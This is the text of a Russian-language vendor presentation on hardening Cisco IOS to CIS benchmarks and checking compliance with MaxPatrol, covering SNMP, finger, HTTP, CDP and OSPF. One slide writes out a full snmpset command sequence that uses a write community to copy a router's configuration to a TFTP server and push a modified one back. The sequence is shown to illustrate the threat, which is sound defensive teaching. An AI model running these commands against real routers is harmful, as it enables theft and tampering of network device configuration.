Сканирование - positive technologies · Сканирование cisco ios в maxpatrol...
TRANSCRIPT
-
Сканирование Cisco IOS в MaxPatrol
Сафронов Илья
-
What’s the deal? ― Безопасность сетевых устройств (Cisco IOS) ― Стандарты безопасности ― Контроль за соответствием стандартам безопасности
PresenterPresentation NotesТут скажем что презентация о безопасной настройке IOS, соответствия стандартам безопасности и использования Maxpatrol.Презентация будет полезна для админов/безопасников сетей, которые могут прикупить себе МП для решения задач по приведению сети в безопасное состояниe
-
Cisco security hardening ― Комплексный подход к безопасности устройств Cisco.
• Management Plane (управляющий IOS’ом трафик (SSH, SNMP))
• Control Plane (трафик управления сетью (BGP, STP)) • Data Plane ( проходящие сквозь устройство данные)
-
Security benchmarking -CIS Рекомендации и стандарты по безопасности оборудования и ПО.
-
CIS – Cisco IOS
― Бенчмарк по безопасности для Cisco IOS
-
CIS – Cisco IOS Группы проверок:
― AAA ― SNMP ― Global services (CDP, DHCP, HTTP) ― Logging ― Neighbor authentication (EIGRP, OSPF, RIP)
-
Как проверить? ― Max Patrol
-
Чего бояться?
-
Проверка SNMP
-
Настройки на устройстве
-
Угроза – Snmpwalk enumeration
-
Угроза - Копирование файла конфигурации через SNMP
TFTP-сервер
snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address . snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config
snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1
///Возврат модифицированного файла конфигурации (startup-config) //обратно на устройство snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3 snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address . snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-config snmpset -v 1 -c private .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1 //Перезагрузка устройства для применения изменений
-
Решение?
-
Проверка finger
-
Настройки на устройстве
-
Угроза – login enumeration
-
Решение?
-
Проверка HTTP
-
Настройки на устройстве
-
Угроза – кража учетных данных
-
Решение ?
-
Проверка CDP
-
Настройки на устройстве
-
Угроза - Enumeration через CDP
-
Решение ?
-
Аутентификация OSPF
-
Настройки на устройстве
-
Угроза – «Отравление» таблиц маршрутизации
-
Решение?
-
Кастомный стандарт ― Не нравится / не подходит стандарт? ― Собери свой!
-
Заключение ― Защищайте свои сетевые устройства ― Следите за стандартами безопасности ― Регулярно проводите аудит сети
-
Конец рассказа Спасибо за внимание
Сафронов Илья
isafronov@ ptsecurity.ru
-
Slide Number 1Сканирование Cisco IOS в MaxPatrolWhat’s the deal?Cisco security hardeningSecurity benchmarkingCIS – Cisco IOSCIS – Cisco IOSКак проверить?Чего бояться?Проверка SNMPНастройки на устройствеУгроза – Snmpwalk enumeration�Угроза - Копирование файла конфигурации через SNMP�Решение?Проверка fingerНастройки на устройствеУгроза – login enumerationРешение?Проверка HTTPНастройки на устройствеУгроза – кража учетных данныхРешение ?Проверка CDPНастройки на устройствеУгроза - Enumeration через CDPРешение ?Аутентификация OSPFНастройки на устройствеУгроза – «Отравление» таблиц маршрутизацииРешение?Кастомный стандартЗаключениеSlide Number 33Slide Number 34